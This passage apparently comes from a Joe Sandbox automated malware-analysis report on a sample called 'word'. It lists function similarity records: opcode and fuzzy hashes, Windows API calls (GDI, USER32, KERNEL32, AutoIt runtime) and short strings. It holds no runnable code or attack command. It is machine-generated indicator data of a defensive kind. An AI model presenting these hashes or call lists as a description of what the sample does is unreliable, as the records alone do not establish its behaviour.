                                                                            • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                            • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                            • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                            • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00434037
                                                                            • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                            • ScreenToClient.USER32(?,?), ref: 00434085
                                                                            • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                            • String ID:
                                                                            • API String ID: 357397906-0
                                                                            • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                            • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                            • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                            • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                            • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                            • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                            APIs
                                                                            • __wsplitpath.LIBCMT ref: 00436A45
                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                            • __wsplitpath.LIBCMT ref: 00436A6C
                                                                            • __wcsicoll.LIBCMT ref: 00436A93
                                                                            • __wcsicoll.LIBCMT ref: 00436AB0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                            • String ID:
                                                                            • API String ID: 1187119602-0
                                                                            • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                            • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                            • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                            • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1597257046-0
                                                                            • Opcode ID: 9080831c6e3327375fa8e2590c4296ec00bc2fee719a816d2a7a1c5fc2e8ee26
                                                                            • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                            • Opcode Fuzzy Hash: 9080831c6e3327375fa8e2590c4296ec00bc2fee719a816d2a7a1c5fc2e8ee26
                                                                            • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: DeleteDestroyObject$IconWindow
• String ID:
• API String ID: 3349847261-0
• Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
• Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
• Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
• Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0044B60B
• InterlockedExchange.KERNEL32(?,?), ref: 0044B619
• LeaveCriticalSection.KERNEL32(?), ref: 0044B630
• LeaveCriticalSection.KERNEL32(?), ref: 0044B641
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
• Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
• Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
• Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
• Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
APIs
  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
• MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
• LineTo.GDI32(?,00000000,00000002), ref: 004472A0
• EndPath.GDI32(?), ref: 004472B0
• StrokePath.GDI32(?), ref: 004472BE
Similarity
• API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
• String ID:
• API String ID: 2783949968-0
• Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
• Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
• Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
• Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
APIs
• __getptd.LIBCMT ref: 00417D1A
  • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
  • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
• __getptd.LIBCMT ref: 00417D31
• __amsg_exit.LIBCMT ref: 00417D3F
• __lock.LIBCMT ref: 00417D4F
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID:
• API String ID: 3521780317-0
• Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
• Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
• Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
• Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
APIs
• GetDesktopWindow.USER32 ref: 00471144
• GetDC.USER32(00000000), ref: 0047114D
• GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
• ReleaseDC.USER32(00000000,?), ref: 0047117B
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
• Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
• Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
• Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
APIs
• GetDesktopWindow.USER32 ref: 00471102
• GetDC.USER32(00000000), ref: 0047110B
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
• ReleaseDC.USER32(00000000,?), ref: 00471139
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
• Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
• Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
• Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
APIs
• SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
• GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
• GetCurrentThreadId.KERNEL32(00000000), ref: 004389DA
• AttachThreadInput.USER32(00000000), ref: 004389E1
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
• Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
• Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
• Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
• CloseHandle.KERNEL32(?), ref: 004390EB
• CloseHandle.KERNEL32 ref: 004390F0
  • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
  • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000), ref: 00438FC8
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
• Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
• Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
• Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
APIs
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
• __getptd_noexit.LIBCMT ref: 00414080
• __freeptd.LIBCMT ref: 0041408A
• ExitThread.KERNEL32 ref: 00414093
Similarity
• API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
• String ID:
• API String ID: 3182216644-0
• Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
• Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
• Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
• Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
Strings
Similarity
• API ID: BuffCharLower
• String ID: $8'I
• API String ID: 2358735015-3608026889
• Opcode ID: 6283da0382942cdf179c2defd90104cfb3bb41bca83c8823c3d3809723584f1e
• Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
• Opcode Fuzzy Hash: 6283da0382942cdf179c2defd90104cfb3bb41bca83c8823c3d3809723584f1e
• Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
APIs
• OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
Strings
                                                                            Similarity
                                                                            • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                            • String ID: AutoIt3GUI$Container
                                                                            • API String ID: 3380330463-3941886329
                                                                            • Opcode ID: 031cbee35206a8445208c2b512d30020b761577131fe68926333f9eb27ef2b8d
                                                                            • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                            • Opcode Fuzzy Hash: 031cbee35206a8445208c2b512d30020b761577131fe68926333f9eb27ef2b8d
                                                                            • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HH$HH
                                                                            • API String ID: 0-1787419579
                                                                            • Opcode ID: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                            • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                            • Opcode Fuzzy Hash: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                            • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: 99cbe353e2901de66005753853838c613826515f51032c8bbd27fd43aed3c9d1
                                                                            • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                            • Opcode Fuzzy Hash: 99cbe353e2901de66005753853838c613826515f51032c8bbd27fd43aed3c9d1
                                                                            • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0
                                                                            • API String ID: 0-4108050209
                                                                            • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                            • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                            • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                            • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                            • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                            • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                            • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 00474833
                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                            • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                            • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                            • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMenuPopup
                                                                            • String ID: X+
                                                                            • API String ID: 3826294624-1938338529
                                                                            • Opcode ID: 6cc80276a77257b4a7440ecd59e59889850be4016b64337e7ed00362276ef1a5
                                                                            • Instruction ID: 7f91a4590d0182010b64de3f09e19208a551650f1ca78392937ca0f6ec2af794
                                                                            • Opcode Fuzzy Hash: 6cc80276a77257b4a7440ecd59e59889850be4016b64337e7ed00362276ef1a5
                                                                            • Instruction Fuzzy Hash: CC21AC35600201CFE724CF28D084BABB3E1BBAA324F14841FE59887360CB7568CACB65
                                                                            APIs
                                                                            • DefDlgProcW.USER32(?,00000114,00000000,?,?,?,?,?,004A83D8,?), ref: 00469A31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Proc
                                                                            • String ID: X+
                                                                            • API String ID: 2346855178-1938338529
                                                                            • Opcode ID: dc39a28d6584410e7e9d39be8fdef0c21f65586a3d31f41dfecdd17b11510ed2
                                                                            • Instruction ID: 5414628f158ba78a046d4a24b655e4ccbf4c8d46c3d310d0e0a8d963d1b880b8
                                                                            • Opcode Fuzzy Hash: dc39a28d6584410e7e9d39be8fdef0c21f65586a3d31f41dfecdd17b11510ed2
                                                                            • Instruction Fuzzy Hash: B4115932700150ABE610CA59EC44E7BB79DEBCA725F14815FF68093282DBB96C05D77B
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: htonsinet_addr
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 3832099526-2422070025
                                                                            • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                            • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                            • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                            • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend_wcslen
                                                                            • String ID: ComboBox$ListBox
